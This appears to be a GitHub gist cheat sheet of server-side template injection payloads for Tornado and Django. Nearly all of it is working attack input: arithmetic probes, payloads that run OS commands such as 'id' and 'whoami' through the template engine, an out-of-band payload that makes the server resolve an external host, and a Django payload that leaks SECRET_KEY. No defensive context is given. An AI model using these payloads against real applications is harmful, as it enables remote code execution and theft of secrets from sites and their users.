Skip to content

Instantly share code, notes, and snippets.

@AliMilani
Last active March 31, 2025 08:53
Show Gist options
  • Select an option

  • Save AliMilani/2f0079146f328def8a0af1c53392d2aa to your computer and use it in GitHub Desktop.

Select an option

Save AliMilani/2f0079146f328def8a0af1c53392d2aa to your computer and use it in GitHub Desktop.
SSTI

Tornado

  • Tornado - Basic Injection
{{7*7}}
{{7*'7'}}
  • Remote Command Execution
{{ __import__('os').popen('id').read() }}
{{os.system('whoami')}}
{%import os%}{{os.system('nslookup oastify.com')}}

Django

 {{ settings.SECRET_KEY }}
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment